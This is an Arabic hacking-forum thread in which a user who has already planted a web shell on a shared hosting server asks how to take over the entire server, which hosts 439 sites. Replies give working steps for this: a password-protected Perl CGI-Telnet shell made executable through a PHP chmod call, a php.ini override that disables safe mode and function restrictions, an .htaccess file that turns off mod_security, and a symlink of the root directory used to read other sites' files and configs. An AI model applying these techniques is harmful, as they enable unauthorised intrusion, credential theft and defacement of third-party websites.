التواصل المباشر مع الادارة والاعضاء القدامى من خلال قناة التلغرام



العودة   :: vBspiders Professional Network :: > [ ::. خدماتنـــــا .:: ] > جـــ'ابات العناكــ'ب

موضوع مغلق
 
LinkBack أدوات الموضوع انواع عرض الموضوع
قديم 06-25-2012, 01:50 AM   رقم المشاركة : 1 (permalink)
معلومات العضو
 
إحصائية العضو








خالد سعودي غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 11
خالد سعودي is on a distinguished road

سؤال مجاب: محترفين السيرفر فقط ؟


بسم الله الرحمن الرحيم
السلام عليكم ورحمه الله وبركاته
كيف حالكم ياشباب
فضلا وليس امرا في سيرفر اخترقته ولم رجعت لي السيرفر اختراق موقع مرة ثانية رفعت الشل عليه ابي اختراق السيرفر كامل استعرض الملفات الكوفينق بعد عمل الاختصار txt تطلع المواقع لم افتح تطلع الصفحة الرئسية علما باني جربت كل الطرق عليه مانفع . ابي طريقة احترافية جدا اذكان ممكن
لكم بعض المعلومات
There are : [ 439 ] Domain موقع
PHP النسخة 5.2.17
السرفيرSoftware: Apache/2.2.22 (Unix)
السيف مودSafe-mode: OFF (no secure)
الدوال المعطله
disable_functions = "system,dlopen,popen,passthru,proc_open,proc_close ,dl,escapeshellcmd,proc_nice,system_exec,shell_exe c,exec,fpassthru,crack_check,crack_closedict,crack _getlastmessage,crack_opendict,psockopen,php_ini_s canned_files,hell-exec,system,dl,ctrl_dir,phpini,tmp,safe_mode,syste mroot,server_software,get_current_user,HTTP_HOST,i ni_restore,popen,pclose,exec,shell_exec,suExec,pas sthru,proc_open,proc_nice,proc_terminate,proc_get_ status,proc_close,leak,apache_child_terminate,posi x_kill,posix_mkfifo,posix_setpgid,posix_setsid,pos ix_setuid,escapeshellcmd,escapeshellarg,posix_cter mid,posix_getcwd,posix_getegid,posix_geteuid,posix _getgid,posix_getgrgid,posix_getgrnam,posix_getgro ups,posix_getlogin,posix_getpgid,posix_getpgrp,pos ix_getpid,posix_getppid,posix_getpwnam,posix_getpw uid,posix_getrlimit,posix_getsid,posix_getuid,posi x_isatty,posix_setegid,posix_seteuid,posix_setgid, posix_times,posix_ttyname,posix_uname,posix_access ,posix_get_last_error,posix_mknod,posix_strerror,p osix_initgroups,posix_setsidposix_setuid,symlink"
;disable_functions = "system,dlopen,popen,passthru,proc_open,proc_close ,dl,escapeshellcmd,proc_nice,system_exec,shell_exe c,exec,fpassthru,crack_check,crack_closedict,crack _getlastmessage,crack_opendict,psockopen,php_ini_s canned_files,hell-exec,system,dl,ctrl_dir,phpini,tmp,safe_mode,syste mroot,server_software,get_current_user,HTTP_HOST,i ni_restore,popen,pclose,exec,shell_exec,suExec,pas sthru,proc_open,proc_nice,proc_terminate,proc_get_ status,proc_close,leak,apache_child_terminate,posi x_kill,posix_mkfifo,posix_setpgid,posix_setsid,pos ix_setuid,escapeshellcmd,escapeshellarg,posix_cter mid,posix_getcwd,posix_getegid,posix_geteuid,posix _getgid,posix_getgrgid,posix_getgrnam,posix_getgro ups,posix_getlogin,posix_getpgid,posix_getpgrp,pos ix_getpid,posix_getppid,posix_getpwnam,posix_getpw uid,posix_getrlimit,posix_getsid,posix_getuid,posi x_isatty,posix_setegid,posix_seteuid,posix_setgid, posix_times,posix_ttyname,posix_uname,posix_access ,posix_get_last_error,posix_mknod,posix_strerror,p osix_initgroups,posix_setsidposix_setuid"
;disable_functions = "system,dlopen,popen,passthru,proc_open,proc_close ,dl,escapeshellcmd,proc_nice,system_exec,shell_exe c,exec,fpassthru,crack_check,crack_closedict,crack _getlastmessage,crack_opendict,psockopen,php_ini_s canned_files,hell-exec,system,dl,ctrl_dir,phpini,tmp,safe_mode,syste mroot,server_software,get_current_user,HTTP_HOST,i ni_restore,popen,pclose,exec,shell_exec,suExec,pas sthru,proc_open,proc_nice,proc_terminate,proc_get_ status,proc_close,leak,apache_child_terminate,posi x_kill,posix_mkfifo,posix_setpgid,posix_setsid,pos ix_setuid,escapeshellcmd,escapeshellarg,posix_cter mid,posix_getcwd,posix_getegid,posix_geteuid,posix _getgid,posix_getgrgid,posix_getgrnam,posix_getgro ups,posix_getlogin,posix_getpgid,posix_getpgrp,pos ix_getpid,posix_getppid,posix_getpwnam,posix_getpw uid,posix_getrlimit,posix_getsid,posix_getuid,posi x_isatty,posix_setegid,posix_seteuid,posix_setgid, posix_times,posix_ttyname,posix_uname,posix_access ,posix_get_last_error,posix_mknod,posix_strerror,p osix_initgroups,posix_setsidposix_setuid,symlink"

شباب لو معليكم امر ابي طريقة اخترافية جدا تكون مرتبة
انا في انتظاركم يامحترفين
فمان الرحمن




Vspan style="font-weight: bold; color: #006400;"Cl[hf:VLspanC lpjvtdk hgsdvtv tr' ?

   

أفضل جواب - كتبه MaFia
بسم الله ما شاء الله
الدوال الممنوعه :D \

ارفع الشل المرفق
هو وملف
.htaccess

فى مجلد لوحدهم
وبعدها اعمل ملف جديد بأسم
vbspiders.php
وحط جواه الكود
<? chmod("vbspiders.nEx",0755) ?>

وارفعه داخل مجلد الشل المرفق +
استعرض ملف البي اتش بي من المتصفح
localhost/vbspiders.php
هتلاقي صفحه بيضه

بعدها استعرض الشل المرفق
localhost/vbspiders.nEx

وادخل فى خانة الباسورد
vbspiders
وطبق اوامر بدون اي مشاكل
قديم 06-25-2012, 02:48 AM   رقم المشاركة : 2 (permalink)
معلومات العضو
 
الصورة الرمزية bleu moon
 

 

 
إحصائية العضو








bleu moon غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 12
bleu moon is on a distinguished road

افتراضي رد: محترفين السيرفر فقط ؟


ارفع ملف php.ini

يكون محتواه

safe_mode = OFF

disable_functions = NONE
safe_mode_gid = OFF
open_basedir = OFF

   

قديم 06-25-2012, 03:39 AM   رقم المشاركة : 3 (permalink)
معلومات العضو
 
إحصائية العضو








خالد سعودي غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 11
خالد سعودي is on a distinguished road

افتراضي رد: محترفين السيرفر فقط ؟


شكرا لك ياغالي ولكن وين الرفعه على مسار الشل او في مجلد الاختصار
انا رفعت على مسار الشل ابي ستغرضها ما يفتح معي ؟

   

قديم 06-25-2012, 09:36 AM   رقم المشاركة : 4 (permalink)
معلومات العضو
 
الصورة الرمزية Sn4Ke'z
 

 

 
إحصائية العضو






Sn4Ke'z غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
Sn4Ke'z is on a distinguished road

افتراضي رد: محترفين السيرفر فقط ؟


هههه موفق باذن الله في اختراق رزمة من المواقع و لا تنساني بالاندكس

   

قديم 06-25-2012, 02:17 PM   رقم المشاركة : 5 (permalink)
معلومات العضو
MaFia
../Cody
 
الصورة الرمزية MaFia
 

 

 
إحصائية العضو








MaFia غير متواجد حالياً

إرسال رسالة عبر Yahoo إلى MaFia

 

 

إحصائية الترشيح

عدد النقاط : 16
MaFia is on a distinguished road

افتراضي رد: محترفين السيرفر فقط ؟


بسم الله ما شاء الله
الدوال الممنوعه :D \

ارفع الشل المرفق
هو وملف
.htaccess

فى مجلد لوحدهم
وبعدها اعمل ملف جديد بأسم
vbspiders.php
وحط جواه الكود
<? chmod("vbspiders.nEx",0755) ?>

وارفعه داخل مجلد الشل المرفق +
استعرض ملف البي اتش بي من المتصفح
localhost/vbspiders.php
هتلاقي صفحه بيضه

بعدها استعرض الشل المرفق
localhost/vbspiders.nEx

وادخل فى خانة الباسورد
vbspiders
وطبق اوامر بدون اي مشاكل

الملفات المرفقة
نوع الملف: zip شل البيرل.zip‏ (7.1 كيلوبايت, المشاهدات 10)
:: نصائح مهمه :: - أفحص الملف المرفق بأي برنامج مضاد للفيروسات
2- قم بمراسلة المراقب عن أي مرفق يوجد به فيروس
3- المنتدى غير مسوؤل عن مايحتويه المرفق من بيانات
التوقيع

"إن للناس وجها شريرا وآخر طيبا والذكاء هو التعامل مع الجزء الطيب

من كل إنسان تقابله في حياتك

 


التعديل الأخير تم بواسطة MaFia ; 06-25-2012 الساعة 02:20 PM.

   

قديم 06-25-2012, 02:45 PM   رقم المشاركة : 6 (permalink)
معلومات العضو
 
الصورة الرمزية bleu moon
 

 

 
إحصائية العضو








bleu moon غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 12
bleu moon is on a distinguished road

افتراضي رد: محترفين السيرفر فقط ؟


لو بدك تعمل اختصار للسيرفر

mkdir test
cd test
ارفع .htaccess

اقتباس
<Files *.php>
ForceType application/x-httpd-php4
</files>
<IfModule mod_security.c>
SecFilterEngine off
SecFilterScanPOST off
</IfModule>

ln -s / 1.php

الآن استعرض 1.php

test/1.php/home/us3r/public_html

   

قديم 06-25-2012, 03:32 PM   رقم المشاركة : 7 (permalink)
معلومات العضو
 
إحصائية العضو








خالد سعودي غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 11
خالد سعودي is on a distinguished road

افتراضي رد: محترفين السيرفر فقط ؟


هلا بك ياغالي عندما حملة الملف لي في المرفقات حصلت vb.php. vbspiders.nEx الهتكس غير موجود
عموما رفعت htaccess عندي في مجلد وبعدين رفعت vb.php من الشل لموقع فتحها حصل موجود الكود برفع الملف في مجلد الشل vbspiders.nEx مايرفع معي رحت رفعته من من الشل . استعرضت vb.php تطلع صفحة بيضاء ومن ثم استعرضت vbspiders.nEx تطلع اول الصفحة #!/usr/bin/perl
#------------------------------------------------------------------------------
# Copyright and Licence
#------------------------------------------------------------------------------
# CGI-Telnet Version 1.0 for NT and Unix : Run Commands on your Web Server
ملاحظة تري هذا ماني فاهمه
وادخل فى خانة الباسورد
vbspiders
وطبق اوامر بدون اي مشاكل
-------------------------
يعني نفيذ الامرcat /etc/xxxx.com
من احد الموقع احد الموقع في السيرفر ستبدالة في xxxx انا سويت كذا صح ام خطا نفذت الامر بس طلع مافي شي
على فكرة تري vbspiders.php وvbspiders.nEx
على نفس مسار الشل لي رفع عليه الموقع
انا في انتظارك

   

قديم 06-25-2012, 03:44 PM   رقم المشاركة : 8 (permalink)
معلومات العضو
 
إحصائية العضو








خالد سعودي غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 11
خالد سعودي is on a distinguished road

افتراضي رد: محترفين السيرفر فقط ؟


nor15din
ماكو فائدة

   

قديم 06-25-2012, 10:56 PM   رقم المشاركة : 9 (permalink)
معلومات العضو
MaFia
../Cody
 
الصورة الرمزية MaFia
 

 

 
إحصائية العضو








MaFia غير متواجد حالياً

إرسال رسالة عبر Yahoo إلى MaFia

 

 

إحصائية الترشيح

عدد النقاط : 16
MaFia is on a distinguished road

افتراضي رد: محترفين السيرفر فقط ؟


اقتباس
#!/usr/bin/perl

ارفع الهتاكس المرفق مع الشل يا غالي فى مجلد لوحدهم

طبعا انت مش هتعرف تعمل مجلد جديد .. هنعتد على دالة
mkdir
لانها مش ممنوعه ومن خلالها نقدر نعمل مجلد
اعمل ملف جديد على جهازك بأسم
name.php
وحط بداخله الكود
<?php
mkdir("vbspiders");
?>
وارفعه مثلا فى الرئسيه
public_html

واستعرضه
localhost/name.php
بتجد صفحة بيضه
بعدها ارجع للشل بتجد مجلد بأسم
vbspiders
وتابع الخطوات
ارفع شل البيرل
ثم ملف الهتاكس المرفق مع الشل
+
ملف vb.php
لان ملف vb.php
بيصرح شل البيرل
تصريح 755
ودالة chmod
الخاصة بتصريح الملفات والمجلدات
مش ممنوعه
والحياه عسسسسسسل
جرب واعطينا نتيجة

التوقيع

"إن للناس وجها شريرا وآخر طيبا والذكاء هو التعامل مع الجزء الطيب

من كل إنسان تقابله في حياتك

 

   

قديم 06-25-2012, 11:44 PM   رقم المشاركة : 10 (permalink)
معلومات العضو
 
إحصائية العضو








خالد سعودي غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 11
خالد سعودي is on a distinguished road

افتراضي رد: محترفين السيرفر فقط ؟


اخي الكريم بعرف اوامر الينكس لان جهازي الينكس ولكن ممكن هنا خطا ليت تضيفني عندك برسلك ايميلي

   

قديم 06-25-2012, 11:54 PM   رقم المشاركة : 11 (permalink)
معلومات العضو
MaFia
../Cody
 
الصورة الرمزية MaFia
 

 

 
إحصائية العضو








MaFia غير متواجد حالياً

إرسال رسالة عبر Yahoo إلى MaFia

 

 

إحصائية الترشيح

عدد النقاط : 16
MaFia is on a distinguished road

افتراضي رد: محترفين السيرفر فقط ؟


اللهم يزيدك يا غالي

انا شرحت لك طريقة استغلال الدوال الغير ممنوعه .. ممكن تفيدك او تفيد غيرك
ولو تطرح الخطا اللي ظهر معك مافي مشاكل لكي الجميع يستفاد ..

التوقيع

"إن للناس وجها شريرا وآخر طيبا والذكاء هو التعامل مع الجزء الطيب

من كل إنسان تقابله في حياتك

 

   

قديم 06-26-2012, 06:08 AM   رقم المشاركة : 12 (permalink)
معلومات العضو
 
إحصائية العضو








خالد سعودي غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 11
خالد سعودي is on a distinguished road

افتراضي رد: محترفين السيرفر فقط ؟


طيب انا عطيتك الموقع طبق عليه صار معاك

   

قديم 06-26-2012, 03:10 PM   رقم المشاركة : 13 (permalink)
معلومات العضو
MaFia
../Cody
 
الصورة الرمزية MaFia
 

 

 
إحصائية العضو








MaFia غير متواجد حالياً

إرسال رسالة عبر Yahoo إلى MaFia

 

 

إحصائية الترشيح

عدد النقاط : 16
MaFia is on a distinguished road

افتراضي رد: محترفين السيرفر فقط ؟


المشكلة
من البداية مش من السيف مود لان الشل انا شوفته والسيف مود اوف

واعذورني لان بقعد من كافيه نت والاميل بيفصل
كان فى موضوع حاطط فيه سكربت سحب كونفيجات السيرفر هحاول ابحث عنه
وارفقه لان شوفت اكواد السكربت
اللي انت شغال به مش تمام
التوقيع

"إن للناس وجها شريرا وآخر طيبا والذكاء هو التعامل مع الجزء الطيب

من كل إنسان تقابله في حياتك

 

   

قديم 06-26-2012, 10:30 PM   رقم المشاركة : 14 (permalink)
معلومات العضو
 
إحصائية العضو








خالد سعودي غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 11
خالد سعودي is on a distinguished road

افتراضي رد: محترفين السيرفر فقط ؟


شكرا على جهودك ياغالي

   

قديم 06-27-2012, 12:30 AM   رقم المشاركة : 15 (permalink)
معلومات العضو
MaFia
../Cody
 
الصورة الرمزية MaFia
 

 

 
إحصائية العضو








MaFia غير متواجد حالياً

إرسال رسالة عبر Yahoo إلى MaFia

 

 

إحصائية الترشيح

عدد النقاط : 16
MaFia is on a distinguished road

افتراضي رد: محترفين السيرفر فقط ؟


بالتوفيق ان شاء الله وللافادة استعمل السكربت
اللي هنا
سكربت سحب كونفيجات السيرفر

التوقيع

"إن للناس وجها شريرا وآخر طيبا والذكاء هو التعامل مع الجزء الطيب

من كل إنسان تقابله في حياتك

 

   

موضوع مغلق

مواقع النشر (المفضلة)


تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة

الانتقال السريع


الساعة الآن 11:46 PM


[ vBspiders.Com Network ]

SEO by vBSEO 3.6.0